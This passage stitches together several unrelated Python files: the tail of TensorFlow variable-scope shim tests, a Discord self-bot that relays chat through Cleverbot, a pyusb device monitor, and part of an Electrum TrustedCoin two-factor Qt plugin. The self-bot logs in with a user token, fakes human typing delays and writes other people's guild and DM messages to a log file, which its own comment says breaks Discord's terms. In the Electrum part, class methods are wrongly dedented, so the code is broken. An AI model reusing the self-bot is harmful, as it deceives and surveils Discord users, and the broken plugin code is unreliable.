          out = tf.nn.bias_add(out, bias)
        with tf.compat.v1.variable_scope("nested_scope"):
          with tf.compat.v1.variable_scope("dense_two"):
            kernel = tf.compat.v1.get_variable(
                shape=[out.shape[-1], self.units],
                regularizer=regularizers.L2(),
                initializer=tf.compat.v1.ones_initializer(),
                name="kernel")
            bias = tf.compat.v1.get_variable(
                shape=[self.units,],
                initializer=tf.compat.v1.zeros_initializer(),
                name="bias")
            out = tf.matmul(out, kernel)
            out = tf.nn.bias_add(out, bias)
        return out
    layer = WrappedDenseLayer(10)
    out = layer(tf.ones(shape=(5, 5)))
    weights = {x.name: x for x in layer.variables}
    # Verify the correct output, regularization losses, + variables were made
    self.assertEqual(weights.keys(), {"dense_one/bias:0",
                                      "dense_one/kernel:0",
                                      "nested_scope/dense_two/bias:0",
                                      "nested_scope/dense_two/kernel:0"})
    self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 50)
    self.assertAllEqual(tf.add_n(layer.losses), 1.5)
    # Verify reuse by updating the variables then re-running
    weights["dense_one/kernel:0"].assign(tf.ones(shape=(5, 10)) * 2)
    weights["nested_scope/dense_two/kernel:0"].assign(
        tf.ones(shape=(10, 10)) * 2)
    out = layer(tf.ones(shape=(5, 5)))
    self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 200)
    self.assertAllEqual(tf.add_n(layer.losses), 6)
  def test_compat_v1_layer(self):
    # Test the shim when using `compat.v1` layers
    class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
      def __init__(self, units, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.units = units
      def forward_pass(self, inputs, training=None):
        out = core_layers.dense(
            inputs, self.units, name="dense_one",
            kernel_initializer=tf.compat.v1.ones_initializer(),
            kernel_regularizer="l2")
        with tf.compat.v1.variable_scope("nested_scope"):
          out = core_layers.dense(
              out, self.units, name="dense_two",
              kernel_initializer=tf.compat.v1.ones_initializer(),
              kernel_regularizer="l2")
        return out
    layer = WrappedDenseLayer(10)
    out = layer(tf.ones(shape=(5, 5)))
    weights = {x.name: x for x in layer.variables}
    # Verify the correct output, losses, + variables were made
    self.assertEqual(weights.keys(), {"dense_one/bias:0",
                                      "dense_one/kernel:0",
                                      "nested_scope/dense_two/bias:0",
                                      "nested_scope/dense_two/kernel:0"})
    self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 50)
    self.assertAllEqual(tf.add_n(layer.losses), 1.5)
    # Verify reuse by updating the variables then re-running
    weights["dense_one/kernel:0"].assign(tf.ones(shape=(5, 10)) * 2)
    weights["nested_scope/dense_two/kernel:0"].assign(
        tf.ones(shape=(10, 10)) * 2)
    out = layer(tf.ones(shape=(5, 5)))
    self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 200)
    self.assertAllEqual(tf.add_n(layer.losses), 6)
  def test_shim_exporting(self):
    # Verify a shim-based layer round-trips through tf.saved_model.save
    class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
      def __init__(self, units, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.units = units
      def forward_pass(self, inputs, training=None):
        out = core_layers.dense(
            inputs,
            self.units,
            name="dense_one",
            kernel_initializer=tf.compat.v1.ones_initializer(),
            kernel_regularizer="l2")
        with tf.compat.v1.variable_scope("nested_scope"):
          out = core_layers.dense(
              out,
              self.units,
              name="dense_two",
              kernel_initializer=tf.compat.v1.ones_initializer(),
              kernel_regularizer="l2")
        return out
    layer = WrappedDenseLayer(10)
    layer(tf.ones(shape=(5, 5)))
    tmp_dir = self.get_temp_dir()
    tf.saved_model.save(layer, tmp_dir)
  def test_variable_store_scope_get_variable(self):
    # Test the module shim when using `get_variable` (and regularizers) directly
    class WrappedDenseLayer(tf.Module):
      def __init__(self, units, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.units = units
        self._variable_store = variable_scope_shim._EagerVariableStore()
      def get_compat_v1_regularization_losses(self):
        """Dict w/ regularization losses from `get_variable`."""
        return {name: regularizer() for name, regularizer
                in self._variable_store._regularizers.items()}  # pylint: disable=protected-access
      def __call__(self, inputs, training=None):
        with self._variable_store.scope():
          out = inputs
          with tf.compat.v1.variable_scope("dense_one"):
            # The weights are created with a `regularizer`,
            # so the layer should track their regularization losses
            kernel = tf.compat.v1.get_variable(
                shape=[out.shape[-1], self.units],
                regularizer=regularizers.L2(),
                initializer=tf.compat.v1.ones_initializer(),
                name="kernel")
            bias = tf.compat.v1.get_variable(
                shape=[self.units,],
                initializer=tf.compat.v1.zeros_initializer(),
                name="bias")
            out = tf.matmul(out, kernel)
            out = tf.nn.bias_add(out, bias)
          with tf.compat.v1.variable_scope("nested_scope"):
            with tf.compat.v1.variable_scope("dense_two"):
              kernel = tf.compat.v1.get_variable(
                  shape=[out.shape[-1], self.units],
                  regularizer=regularizers.L2(),
                  initializer=tf.compat.v1.ones_initializer(),
                  name="kernel")
              bias = tf.compat.v1.get_variable(
                  shape=[self.units,],
                  initializer=tf.compat.v1.zeros_initializer(),
                  name="bias")
              out = tf.matmul(out, kernel)
              out = tf.nn.bias_add(out, bias)
          return out
    layer = WrappedDenseLayer(10)
    out = layer(tf.ones(shape=(5, 5)))
    weights = {x.name: x for x in layer.variables}
    # Verify the correct output, regularization losses, + variables were made
    self.assertEqual(weights.keys(), {"dense_one/bias:0",
                                      "dense_one/kernel:0",
                                      "nested_scope/dense_two/bias:0",
                                      "nested_scope/dense_two/kernel:0"})
    self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 50)
    self.assertAllEqual(
        tf.add_n(layer.get_compat_v1_regularization_losses().values()), 1.5)
    # Verify reuse by updating the variables then re-running
    weights["dense_one/kernel:0"].assign(tf.ones(shape=(5, 10)) * 2)
    weights["nested_scope/dense_two/kernel:0"].assign(
        tf.ones(shape=(10, 10)) * 2)
    out = layer(tf.ones(shape=(5, 5)))
    self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 200)
    self.assertAllEqual(
        tf.add_n(layer.get_compat_v1_regularization_losses().values()), 6)
  def test_module_get_variable(self):
    # Test the module shim when using `get_variable` (and regularizers) directly
    class WrappedDenseLayer(VariableScopeModule):
      def __init__(self, units, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.units = units
      def forward_pass(self, inputs, training=None):
        out = inputs
        with tf.compat.v1.variable_scope("dense_one"):
          # The weights are created with a `regularizer`,
          # so the layer should track their regularization losses
          kernel = tf.compat.v1.get_variable(
              shape=[out.shape[-1], self.units],
              regularizer=regularizers.L2(),
              initializer=tf.compat.v1.ones_initializer(),
              name="kernel")
          bias = tf.compat.v1.get_variable(
              shape=[self.units,],
              initializer=tf.compat.v1.zeros_initializer(),
              name="bias")
          out = tf.matmul(out, kernel)
          out = tf.nn.bias_add(out, bias)
        with tf.compat.v1.variable_scope("nested_scope"):
          with tf.compat.v1.variable_scope("dense_two"):
            kernel = tf.compat.v1.get_variable(
                shape=[out.shape[-1], self.units],
                regularizer=regularizers.L2(),
                initializer=tf.compat.v1.ones_initializer(),
                name="kernel")
            bias = tf.compat.v1.get_variable(
                shape=[self.units,],
                initializer=tf.compat.v1.zeros_initializer(),
                name="bias")
            out = tf.matmul(out, kernel)
            out = tf.nn.bias_add(out, bias)
        return out
    layer = WrappedDenseLayer(10)
    out = layer(tf.ones(shape=(5, 5)))
    weights = {x.name: x for x in layer.variables}
    # Verify the correct output, regularization losses, + variables were made
    self.assertEqual(weights.keys(), {"dense_one/bias:0",
                                      "dense_one/kernel:0",
                                      "nested_scope/dense_two/bias:0",
                                      "nested_scope/dense_two/kernel:0"})
    self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 50)
    self.assertAllEqual(
        tf.add_n(layer.get_compat_v1_regularization_losses().values()), 1.5)
    # Verify reuse by updating the variables then re-running
    weights["dense_one/kernel:0"].assign(tf.ones(shape=(5, 10)) * 2)
    weights["nested_scope/dense_two/kernel:0"].assign(
        tf.ones(shape=(10, 10)) * 2)
    out = layer(tf.ones(shape=(5, 5)))
    self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 200)
    self.assertAllEqual(
        tf.add_n(layer.get_compat_v1_regularization_losses().values()), 6)
  def test_module_compat_v1_layer(self):
    # Test the module shim when using `compat.v1` layers
    class WrappedDenseLayer(VariableScopeModule):
      def __init__(self, units, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.units = units
      def forward_pass(self, inputs, training=None):
        out = core_layers.dense(
            inputs, self.units, name="dense_one",
            kernel_initializer=tf.compat.v1.ones_initializer(),
            kernel_regularizer="l2")
        with tf.compat.v1.variable_scope("nested_scope"):
          out = core_layers.dense(
              out, self.units, name="dense_two",
              kernel_initializer=tf.compat.v1.ones_initializer(),
              kernel_regularizer="l2")
        return out
    layer = WrappedDenseLayer(10)
    out = layer(tf.ones(shape=(5, 5)))
    weights = {x.name: x for x in layer.variables}
    # Verify the correct output, losses, + variables were made
    self.assertEqual(weights.keys(), {"dense_one/bias:0",
                                      "dense_one/kernel:0",
                                      "nested_scope/dense_two/bias:0",
                                      "nested_scope/dense_two/kernel:0"})
    self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 50)
    self.assertAllEqual(tf.add_n(
        layer.get_compat_v1_regularization_losses().values()), 1.5)
    # Verify reuse by updating the variables then re-running
    weights["dense_one/kernel:0"].assign(tf.ones(shape=(5, 10)) * 2)
    weights["nested_scope/dense_two/kernel:0"].assign(
        tf.ones(shape=(10, 10)) * 2)
    out = layer(tf.ones(shape=(5, 5)))
    self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 200)
    self.assertAllEqual(tf.add_n(
        layer.get_compat_v1_regularization_losses().values()), 6)
  def test_shim_nesting(self):
    # Test that nesting the shim in itself works
    class NestedLayer(variable_scope_shim.VariableScopeLayer):
      def __init__(self, units, name, *args, **kwargs):
        super().__init__(*args, name=name, **kwargs)
        self.units = units
      def forward_pass(self, inputs):
        out = inputs
        with tf.compat.v1.variable_scope(self.name):
          # The weights are created with a `regularizer`,
          # so the layer should track their regularization losses
          kernel = tf.compat.v1.get_variable(
              shape=[out.shape[-1], self.units],
              regularizer=regularizers.L2(1.0),
              initializer=tf.compat.v1.ones_initializer(),
              name="kernel")
          bias = tf.compat.v1.get_variable(
              shape=[self.units,],
              initializer=tf.compat.v1.initializers.zeros,
              name="bias")
          out = tf.linalg.matmul(out, kernel)
          out = tf.compat.v1.nn.bias_add(out, bias)
        return out
    class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
      def __init__(self, units, **kwargs):
        super().__init__(**kwargs)
        self.units = units
        self.dense_layer_a = None
        self.dense_layer_b = None
      def forward_pass(self, inputs):
        # Only create the nested tf.variable/module/layer/model if it has not
        # already been created!
        if not self.dense_layer_a:
          self.dense_layer_a = NestedLayer(self.units * 2, "dense_one")
        out = self.dense_layer_a(inputs)
        if not self.dense_layer_b:
          self.dense_layer_b = NestedLayer(self.units, "dense_two")
        out = self.dense_layer_b(out)
        return out
    layer = WrappedDenseLayer(5)
    out = layer(tf.ones(shape=(1, 3)))
    weights = {x.name: x for x in layer.variables}
    # Verify the correct output, losses, + variables were made
    # (Specifically: no double-counting of any weights or reg. losses
    # between nested components!)
    self.assertEqual({var.name for var in layer.trainable_weights},
                     {"dense_one/bias:0",
                      "dense_one/kernel:0",
                      "dense_two/bias:0",
                      "dense_two/kernel:0"})
    self.assertEqual({var.name for var in layer.dense_layer_a.weights},
                     {"dense_one/bias:0",
                      "dense_one/kernel:0"})
    self.assertEqual({var.name for var in layer.dense_layer_b.weights},
                     {"dense_two/bias:0",
                      "dense_two/kernel:0"})
    self.assertAllEqual(out, tf.ones(shape=(1, 5)) * 30)
    self.assertAllEqual(tf.add_n(layer.dense_layer_a.losses), 30)
    self.assertAllEqual(tf.add_n(layer.dense_layer_b.losses), 50)
    self.assertAllEqual(tf.add_n(layer.losses), 80)
    # Verify reuse by updating the variables then re-running
    weights["dense_one/kernel:0"].assign(tf.ones(shape=(3, 10)) * 2)
    weights["dense_two/kernel:0"].assign(
        tf.ones(shape=(10, 5)) * 2)
    out = layer(tf.ones(shape=(1, 3)))
    self.assertAllEqual(out, tf.ones(shape=(1, 5)) * 120)
    self.assertAllEqual(tf.add_n(layer.losses), 320)
  def test_compat_v1_make_template_in_shim_eager(self):
    # Test the shim when using `compat.v1.make_template`
    # Verify it works correctly in eager
    layer = CompatV1TemplateScaleByY()
    for _ in range(3):
      # Use multiple calls to verify that no new weights get created
      self.assertAllEqual(layer(tf.ones(shape=(2, 3))),
                          tf.constant(1.5, shape=(2, 3)))
    self.assertAllEqual({var.name: var.numpy() for var in layer.weights},
                        {"foo/scale_by_y/y:0": 1.5})
    self.assertAllEqual(tf.add_n(layer.losses),
                        regularizers.L2()(layer.weights[0]))
  def test_compat_v1_make_template_in_shim_tf_function(self):
    # Test the shim when using `compat.v1.make_template`
    # Verify it works correctly in a tf.function
    # when made outside the function
    layer = CompatV1TemplateScaleByY()
    @tf.function
    def foo(x):
      return layer(x), tf.add_n(layer.losses)
    for _ in range(3):
      # Use multiple calls to verify that no new weights get created
      out, loss = foo(tf.ones(shape=(2, 3)))
      self.assertAllEqual(out, tf.constant(1.5, shape=(2, 3)))
      self.assertAllEqual(loss, regularizers.L2()(layer.weights[0]))
    self.assertAllEqual({var.name: var.numpy() for var in layer.weights},
                        {"foo/scale_by_y/y:0": 1.5})
  def test_compat_v1_make_template_in_trace_in_shim(self):
    # Test the shim when using `compat.v1.make_template`
    # Verify it works correctly when the make_template/layer/shim
    # is created on the first tf.function trace!
    layers = {}
    @tf.function
    def bar(x):
      if "layer" not in layers:
        layers["layer"] = CompatV1TemplateScaleByY()
      layer = layers["layer"]
      return layer(x), tf.add_n(layer.losses)
    for _ in range(3):
      # Use multiple calls to verify that no new weights get created
      out, loss = bar(tf.ones(shape=(2, 3)))
      self.assertAllEqual(out, tf.constant(1.5, shape=(2, 3)))
      self.assertAllEqual(loss, regularizers.L2()(layers["layer"].weights[0]))
    self.assertAllEqual(
        {var.name: var.numpy() for var in layers["layer"].weights},
        {"foo/scale_by_y/y:0": 1.5})
  def test_only_track_get_variable(self):
    # Test the shim does not try tracking or reusing variables
    # that were not created by get_variable. These variables/modules/layers
    # need to be tracked separately
    class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
      def __init__(self, units, **kwargs):
        super().__init__(**kwargs)
        self.units = units
        self._dense_model = None
      def forward_pass(self, inputs):
        dense_layer = core.Dense(
            self.units, name="dense",
            kernel_initializer=tf.compat.v1.ones_initializer(),
            kernel_regularizer="l2")
        return dense_layer(inputs)
    layer = WrappedDenseLayer(10)
    out = layer(tf.ones(shape=(5, 5)))
    self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 5)
    self.assertEmpty(layer.weights)
  def test_embedded_keras_model(self):
    # Test the shim when embedding a Keras model inside of it
    # And assigning the model to an attribute
    class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
      def __init__(self, units, **kwargs):
        super().__init__(**kwargs)
        self.units = units
        self._dense_model = None
      def forward_pass(self, inputs):
        if not self._dense_model:
          inp = input_layer_module.Input(shape=inputs.shape)
          dense_layer = core.Dense(
              self.units, name="dense",
              kernel_initializer=tf.compat.v1.ones_initializer(),
              kernel_regularizer="l2")
          self._dense_model = training_module.Model(
              inputs=inp, outputs=dense_layer(inp))
        return self._dense_model(inputs)
    layer = WrappedDenseLayer(10)
    out = layer(tf.ones(shape=(5, 5)))
    weights = {x.name: x for x in layer.variables}
    # Verify the correct output, losses, + variables were made
    self.assertEqual(weights.keys(), {"dense/bias:0",
                                      "dense/kernel:0"})
    self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 5)
    self.assertAllEqual(tf.add_n(layer.losses), 0.5)
    # Verify reuse by updating the variables then re-running
    weights["dense/kernel:0"].assign(
        tf.ones(shape=(5, 10)) * 2)
    out = layer(tf.ones(shape=(5, 5)))
    self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 10)
    self.assertAllEqual(tf.add_n(layer.losses), 2)
  def test_embedded_keras_model_in_module(self):
    # Test the module shim when embedding a Keras model inside of it
    # And assigning the model to an attribute
    class WrappedDenseLayer(VariableScopeModule):
      def __init__(self, units, **kwargs):
        super().__init__(**kwargs)
        self.units = units
        self._dense_model = None
      def forward_pass(self, inputs):
        if not self._dense_model:
          inp = input_layer_module.Input(shape=inputs.shape)
          dense_layer = core.Dense(
              self.units, name="dense",
              kernel_initializer=tf.compat.v1.ones_initializer(),
              kernel_regularizer="l2")
          self._dense_model = training_module.Model(
              inputs=inp, outputs=dense_layer(inp))
        return self._dense_model(inputs)
    layer = WrappedDenseLayer(10)
    out = layer(tf.ones(shape=(5, 5)))
    weights = {x.name: x for x in layer.variables}
    # Verify the correct output, losses, + variables were made
    self.assertEqual(weights.keys(), {"dense/bias:0",
                                      "dense/kernel:0"})
    self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 5)
    # The module shim will only track regularization losses made by
    # compat.v1.layers and compat.v1.get_variable. Other regularization
    # losses must be tracked by separate user-created mechanisms.
    self.assertEmpty(layer.get_compat_v1_regularization_losses())
    # Verify reuse by updating the variables then re-running
    weights["dense/kernel:0"].assign(
        tf.ones(shape=(5, 10)) * 2)
    out = layer(tf.ones(shape=(5, 5)))
    self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 10)
    # The module shim will only track regularization losses made by
    # compat.v1.layers and compat.v1.get_variable. Other regularization
    # losses must be tracked by separate user-created mechanisms.
    self.assertEmpty(layer.get_compat_v1_regularization_losses())
  def test_training_arg(self):
    # Test the shim when passing in a Keras `training` arg
    class TrainingCheckLayer(variable_scope_shim.VariableScopeLayer):
      def __init__(self, units, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.units = units
      def forward_pass(self, inputs, training=None):
        if training:
          out = core_layers.dense(inputs, self.units, name="dense_training")
        else:
          out = core_layers.dense(inputs, self.units, name="dense_no_training")
        return out
    layer = TrainingCheckLayer(10)
    layer(tf.ones(shape=(5, 5)), training=True)
    weights = {x.name: x for x in layer.variables}
    # Verify the correct variables were made
    self.assertEqual(weights.keys(),
                     {"dense_training/bias:0", "dense_training/kernel:0"})
    layer = TrainingCheckLayer(10)
    layer(tf.ones(shape=(5, 5)))
    weights = {x.name: x for x in layer.variables}
    # Verify the correct variables were made
    self.assertEqual(weights.keys(),
                     {"dense_no_training/bias:0", "dense_no_training/kernel:0"})
  def test_incorrect_decoration(self):
    # Raise an error if you incorrectly decorate a method
    # that is not a method of a Module, layer, or model:
    @variable_scope_shim.track_tf1_style_variables
    def foo(x):
      return x * 2
    with self.assertRaisesRegex(ValueError, "does not extend"):
      foo(tf.ones(shape=(4, 4)))
# Standard TensorFlow test entry point.
if __name__ == "__main__":
  tf.test.main()
|
main.py | import cleverbotfree.cbfree
import sys
import discord
import asyncio
import json
import random, time, threading
from discord.ext.tasks import loop
# Discord self-bot client that relays messages through a Cleverbot session.
bot = discord.Client(description="xddd", self_bot=True)
# Maps guild (or DM author) -> Cleverbot session; "rs" is a pre-warmed spare
# session replenished by the `ns` background thread.
gs={"a":"text"}
# Accumulated chat transcript, flushed to text.log by the `wri` task.
writer=""
# Last transcript snapshot already written to disk.
olw=""
# NOTE(review): token is empty here - it must be filled in before running.
token = ""
print("Creating handler...")
# Warm up a Cleverbot browser session before the first message arrives.
gs["rs"]=cleverbotfree.cbfree.Cleverbot()
gs["rs"].browser.get(gs["rs"].url)
gs["rs"].get_form()
print("Loading discord api...")
# Characters stripped from user input before it is sent to Cleverbot.
illegal_character = [':','<','>','_',"'","-"]
@bot.event
async def on_ready():
    # Connection callback: just confirm the login on stdout.
    print("Logged in")
@bot.event
async def on_message(message):
    """Relay a Discord message through Cleverbot and reply with its answer.

    One Cleverbot session is kept per guild (or per author for DMs); the
    first message from a new chat claims the pre-warmed spare session
    stored under gs["rs"]. The exchange is appended to the global `writer`
    transcript, which the `wri` task persists to text.log.
    """
    print("called")
    if message.author == bot.user:
        return
    global illegal_character, gs, writer
    # Session key: the guild for server channels, the author for DMs.
    key = message.guild if message.guild else message.author
    if key not in gs:
        # Claim the pre-warmed spare; the `ns` thread rebuilds "rs" shortly.
        # NOTE(review): raises KeyError if two new chats race before the
        # spare is replaced - confirm this is acceptable.
        gs[key] = gs.pop("rs")
    user_input = message.content
    for ch in illegal_character:
        user_input = "".join(user_input.split(ch))
    print(user_input)
    if user_input in illegal_character:
        # Dead in practice: the blacklisted characters were just stripped,
        # so the cleaned text can never equal one of them. Kept for parity.
        print(f"{message.author} has said an illegal character")
    # Simulate human typing latency before responding.
    x = random.uniform(0.4, 1.5)
    print("typing...")
    await asyncio.sleep(x)
    async with message.channel.typing():
        gs[key].send_input(user_input)
        b = gs[key].get_response()
        await message.channel.send(b)
    # Console + transcript logging. Guild transcripts include the author in
    # parentheses; DM transcripts use the author alone.
    if message.guild:
        print(str(message.guild) + ":" + message.content)
        log_prefix = str(message.guild) + "(" + str(message.author) + ")"
    else:
        print(str(message.author) + ":" + message.content)
        log_prefix = str(message.author)
    print("bot:" + b)
    writer = writer + "\n" + (log_prefix + ":" + message.content)
    writer = writer + "\n" + ("bot:" + b)
def ns():
    """Session keeper: ensure a spare Cleverbot session exists under
    gs["rs"], rebuilding it whenever a new chat claims the old one.
    Runs forever; meant to live on a background thread.
    """
    global gs
    while True:
        if "rs" not in gs:
            print("making new...")
            session = cleverbotfree.cbfree.Cleverbot()
            gs["rs"] = session
            session.browser.get(session.url)
            session.get_form()
            print("made new")
        time.sleep(2)
# Start the session-replenishing keeper thread.
# NOTE(review): not a daemon thread, so it keeps the process alive on exit.
nss=threading.Thread(target=ns)
nss.start()
@loop(seconds=2)
async def wri():
    """Every 2 seconds, persist the chat transcript to text.log if it changed."""
    global olw, writer
    if writer != olw:
        print("log updated")
        olw = writer
        # Context manager guarantees the handle is closed even if the write
        # raises (the original leaked the handle on error).
        with open("text.log", "w") as f:
            f.write(olw)
# Kick off the periodic log flush, then block on the Discord event loop.
wri.start()
# NOTE(review): `bot=False` marks this as a user-token self-bot; this
# violates Discord ToS and the flag was removed in newer discord.py.
bot.run(token, bot=False)
|
usb_monitor.py | import usb.core
import usb.util
import time
import re
import threading
import logging
# Module-level logger; handler/level configuration is left to the application.
log = logging.getLogger(__name__)
class UsbDescriptor:
    """Identity of a connected USB device.

    Equality is defined by (device_id, bus, address) only; the wrapped
    pyusb device object is carried along but intentionally not compared.
    """

    def __init__(self, device_id, bus, address, device):
        self.device_id = device_id  # "vendor:product" hex string
        self.bus = bus              # three-digit bus string
        self.address = address      # three-digit address string
        self.device = device        # underlying pyusb device (not compared)

    def __repr__(self):
        return (f"{type(self).__name__}(device_id={self.device_id!r}, "
                f"bus={self.bus!r}, address={self.address!r})")

    def __eq__(self, other):
        # Original raised AttributeError when compared against a foreign
        # type; returning NotImplemented lets Python fall back gracefully.
        if not isinstance(other, UsbDescriptor):
            return NotImplemented
        return ((self.device_id, self.bus, self.address)
                == (other.device_id, other.bus, other.address))
class UsbMonitor:
    """Polls pyusb for connected devices and fires found/lost callbacks
    for devices whose vendor:product id is on the white list.
    """

    POLLING_INTERVAL_IN_SEC = 1
    # Parses the header line of pyusb's str(device) into
    # (device_id, bus, address).
    regex = r"DEVICE ID ([a-f0-9]*:[a-f0-9]*) on Bus ([0-9][0-9][0-9]) Address ([0-9][0-9][0-9]) [=]*"

    def __init__(self, white_list_device_ids=None):
        # The original default was `list()`, a mutable default evaluated
        # once and shared across every instance; use None instead.
        self.reported_devices = []
        self.usb_device_found_cb_list = []
        self.usb_device_lost_cb_list = []
        self.request_terminate = False
        self.white_list_device_ids = (
            [] if white_list_device_ids is None else white_list_device_ids)
        self.monitor_thread = None

    @staticmethod
    def device_to_usb_descriptor(device):
        """Build a UsbDescriptor from str(device), or None if unparsable.

        Only the first parsable header in the device's string form is used.
        """
        matches = re.finditer(UsbMonitor.regex, str(device), re.MULTILINE)
        for match in matches:
            if len(match.groups()) != 3:
                # Use the module logger instead of print for consistency.
                log.warning(
                    'Unexpected group size while looking for USB data (3 expected): %s',
                    len(match.groups()))
                continue
            device_id = match.group(1)
            bus = match.group(2)
            address = match.group(3)
            return UsbDescriptor(device_id, bus, address, device)
        return None

    def monitor(self):
        """Polling loop: diff the connected devices against the previously
        reported set and invoke callbacks for white-listed ids."""
        log.info('Looking for connected USB devices: %s',
                 self.white_list_device_ids)
        while not self.request_terminate:
            connected_devices = []
            for dev in usb.core.find(find_all=True):
                usb_descriptor = self.device_to_usb_descriptor(dev)
                if usb_descriptor is not None:
                    connected_devices.append(usb_descriptor)
            # look for new devices
            for dev in connected_devices:
                if (dev not in self.reported_devices
                        and dev.device_id in self.white_list_device_ids):
                    for cb in self.usb_device_found_cb_list:
                        cb(dev)
            # look for lost devices
            for dev in self.reported_devices:
                if (dev not in connected_devices
                        and dev.device_id in self.white_list_device_ids):
                    for cb in self.usb_device_lost_cb_list:
                        cb(dev)
            self.reported_devices = connected_devices
            time.sleep(self.POLLING_INTERVAL_IN_SEC)

    def start(self):
        """Start the polling loop on a background thread."""
        self.monitor_thread = threading.Thread(target=self.monitor, args=())
        self.monitor_thread.start()

    def stop(self, join=True):
        """Ask the polling loop to exit; optionally join the thread.

        New method: the original exposed `request_terminate` with no setter.
        """
        self.request_terminate = True
        if join and self.monitor_thread is not None:
            self.monitor_thread.join()

    def register_device_found_cb(self, cb):
        """Register `cb(descriptor)` to run when a white-listed device appears."""
        self.usb_device_found_cb_list.append(cb)

    def register_device_lost_cb(self, cb):
        """Register `cb(descriptor)` to run when a white-listed device vanishes."""
        self.usb_device_lost_cb_list.append(cb)
|
qt.py | #!/usr/bin/env python
#
# Electrum - Lightweight Bitcoin Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import re
import sys
import threading
from decimal import Decimal
from functools import partial
from threading import Thread

from PyQt5.QtGui import *
from PyQt5.QtCore import *

from electrum_gui.qt.util import *
from electrum_gui.qt.qrcodewidget import QRCodeWidget
from electrum_gui.qt.amountedit import AmountEdit
from electrum_gui.qt.main_window import StatusBarButton
from electrum.i18n import _
from electrum.plugins import hook
from electrum.util import PrintError, is_valid_email

from .trustedcoin import TrustedCoinPlugin, server
class TOS(QTextEdit):
    """Terms-of-service text box.

    The signals exist so the background fetch thread can marshal its result
    (or error) back onto the Qt main thread via queued connections.
    """
    tos_signal = pyqtSignal()
    error_signal = pyqtSignal(object)
class HandlerTwoFactor(QObject, PrintError):
    """Per-window helper that prompts for a TrustedCoin OTP when signing."""

    def __init__(self, plugin, window):
        super().__init__()
        self.plugin = plugin
        self.window = window

    def prompt_user_for_otp(self, wallet, tx, on_success, on_failure):
        """Ask for a Google Authenticator code and submit it for `tx`.

        No-op when the wallet is not a TrustedCoin wallet, can sign without
        the server, or `tx` does not involve the server key. Invokes
        `on_success(tx)` on success or `on_failure(exc_info)` on error.
        """
        if not isinstance(wallet, self.plugin.wallet_class):
            return
        if wallet.can_sign_without_server():
            return
        if not wallet.keystores['x3/'].get_tx_derivations(tx):
            self.print_error("twofactor: xpub3 not needed")
            return
        window = self.window.top_level_window()
        auth_code = self.plugin.auth_dialog(window)
        try:
            wallet.on_otp(tx, auth_code)
        except Exception:
            # Was a bare `except:`, which would also swallow
            # KeyboardInterrupt/SystemExit. (`sys` is imported at file top.)
            on_failure(sys.exc_info())
            return
        on_success(tx)
class Plugin(TrustedCoinPlugin):
    def __init__(self, parent, config, name):
        """Pure pass-through to TrustedCoinPlugin; no Qt-specific init state."""
        super().__init__(parent, config, name)
@hook
def on_new_window(self, window):
wallet = window.wallet
if not isinstance(wallet, self.wallet_class):
return
wallet.handler_2fa = HandlerTwoFactor(self, window)
if wallet.can_sign_without_server():
msg = ' '.join([
_('This wallet was restored from seed, and it contains two master private keys.'),
_('Therefore, two-factor authentication is disabled.')
])
action = lambda: window.show_message(msg)
else:
action = partial(self.settings_dialog, window)
button = StatusBarButton(QIcon(":icons/trustedcoin-status.png"),
_("TrustedCoin"), action)
window.statusBar().addPermanentWidget(button)
self.start_request_thread(window.wallet)
def auth_dialog(self, window):
d = WindowModalDialog(window, _("Authorization"))
vbox = QVBoxLayout(d)
pw = AmountEdit(None, is_int = True)
msg = _('Please enter your Google Authenticator code')
vbox.addWidget(QLabel(msg))
grid = QGridLayout()
grid.setSpacing(8)
grid.addWidget(QLabel(_('Code')), 1, 0)
grid.addWidget(pw, 1, 1)
vbox.addLayout(grid)
msg = _('If you have lost your second factor, you need to restore your wallet from seed in order to request a new code.')
label = QLabel(msg)
label.setWordWrap(1)
vbox.addWidget(label)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
return pw.get_amount()
    def prompt_user_for_otp(self, wallet, tx, on_success, on_failure):
        """Delegate the OTP prompt to the wallet's window-bound 2FA handler."""
